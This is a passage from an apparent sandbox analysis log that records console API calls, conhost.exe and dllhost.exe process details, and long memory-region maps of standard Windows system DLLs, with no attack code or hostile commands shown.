GetProcessHeap () returned 0x600000 [0123.405] RtlFreeHeap (HeapHandle=0x600000, Flags=0x0, BaseAddress=0x609158) returned 1 [0123.405] _get_osfhandle (_FileHandle=1) returned 0x3c [0123.405] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0123.405] _get_osfhandle (_FileHandle=1) returned 0x3c [0123.405] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbaf40c | out: lpMode=0xbaf40c) returned 1 [0123.406] _get_osfhandle (_FileHandle=0) returned 0x38 [0123.406] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xbaf408 | out: lpMode=0xbaf408) returned 1 [0123.406] SetConsoleInputExeNameW () returned 0x1 [0123.406] GetConsoleOutputCP () returned 0x1b5 [0123.406] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xbaf460 | out: lpCPInfo=0xbaf460) returned 1 [0123.406] SetThreadUILanguage (LangId=0x0) returned 0x409 [0123.406] exit (_Code=0) Thread: id = 61 os_tid = 0x814 Process: id = "6" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x33f4d000" os_pid = "0x9c4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x9a4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 975 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 976 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 977 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 978 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 979 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 980 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 981 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 982 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 983 start_va = 0x7ff747c50000 end_va = 0x7ff747c60fff monitored = 0 entry_point = 0x7ff747c516b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 984 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 985 start_va = 0x7b0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 986 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 987 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 988 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 989 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 990 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 991 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 992 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 993 start_va = 0x600000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 994 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 995 start_va = 0x7ffc45080000 end_va = 0x7ffc450d8fff monitored = 0 entry_point = 0x7ffc4508fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 996 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 997 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 998 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 999 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1000 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1001 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1002 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1003 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1004 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1005 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1006 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1007 start_va = 0x7ffc5a3a0000 end_va = 0x7ffc5a525fff monitored = 0 entry_point = 0x7ffc5a3ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1008 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1009 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1010 start_va = 0x600000 end_va = 0x787fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 1011 start_va = 0x790000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1012 start_va = 0x8b0000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 1013 start_va = 0xa40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 1014 start_va = 0x1e40000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 1015 start_va = 0x1e40000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 1016 start_va = 0x1fc0000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 1017 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1018 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1019 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1020 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1021 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1022 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1023 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1024 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1025 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1026 start_va = 0x7ffc5a7b0000 end_va = 0x7ffc5a845fff monitored = 0 entry_point = 0x7ffc5a7d5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1027 start_va = 0x1fd0000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 1028 start_va = 0x2150000 end_va = 0x2486fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1029 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1030 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1031 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 1032 start_va = 0x1e80000 end_va = 0x1ed9fff monitored = 1 entry_point = 0x1e953f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1033 start_va = 0x2490000 end_va = 0x26a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 1034 start_va = 0x26b0000 end_va = 0x28c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 1035 start_va = 0x1e80000 end_va = 0x1f94fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 1036 start_va = 0x28d0000 end_va = 0x2aedfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 1037 start_va = 0x1fd0000 end_va = 0x20dcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 1038 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Thread: id = 58 os_tid = 0x738 Thread: id = 59 os_tid = 0x784 Thread: id = 60 os_tid = 0x708 Process: id = "7" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x11852000" os_pid = "0xc6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x274" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1990 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1991 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1992 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1993 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1994 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1995 start_va = 0x160000 end_va = 0x161fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1996 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 1997 start_va = 0x180000 end_va = 0x186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1998 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1999 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2000 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2001 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2002 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2003 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2004 start_va = 0x4c0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2005 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2006 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 2007 start_va = 0x7d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 2008 start_va = 0x8d0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 2009 start_va = 0x9d0000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 2010 start_va = 0xad0000 end_va = 0xc57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 2011 start_va = 0xc60000 end_va = 0xde0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 2012 start_va = 0xdf0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 2013 start_va = 0x2250000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 2014 start_va = 0x2360000 end_va = 0x245ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2015 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2016 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2017 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2018 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2019 start_va = 0x7ff6ed690000 end_va = 0x7ff6ed696fff monitored = 0 entry_point = 0x7ff6ed691570 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 2020 start_va = 0x7ffc59500000 end_va = 0x7ffc59992fff monitored = 0 entry_point = 0x7ffc5950f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2021 start_va = 0x7ffc5a7b0000 end_va = 0x7ffc5a845fff monitored = 0 entry_point = 0x7ffc5a7d5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2022 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2023 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2024 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2025 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2026 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2027 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2028 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2029 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2030 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2031 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2032 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2033 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2034 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2035 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2036 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2037 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2038 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2039 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2040 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2041 start_va = 0x7ffc5f760000 end_va = 0x7ffc5f806fff monitored = 0 entry_point = 0x7ffc5f76b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2042 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2045 start_va = 0x2460000 end_va = 0x2796fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2046 start_va = 0x7ffc5a3a0000 end_va = 0x7ffc5a525fff monitored = 0 entry_point = 0x7ffc5a3ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2047 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2048 start_va = 0x27a0000 end_va = 0x28e2fff monitored = 0 entry_point = 0x27c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2049 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2050 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2051 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2052 start_va = 0x2260000 end_va = 0x231bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002260000" filename = "" Region: id = 2053 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2054 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: 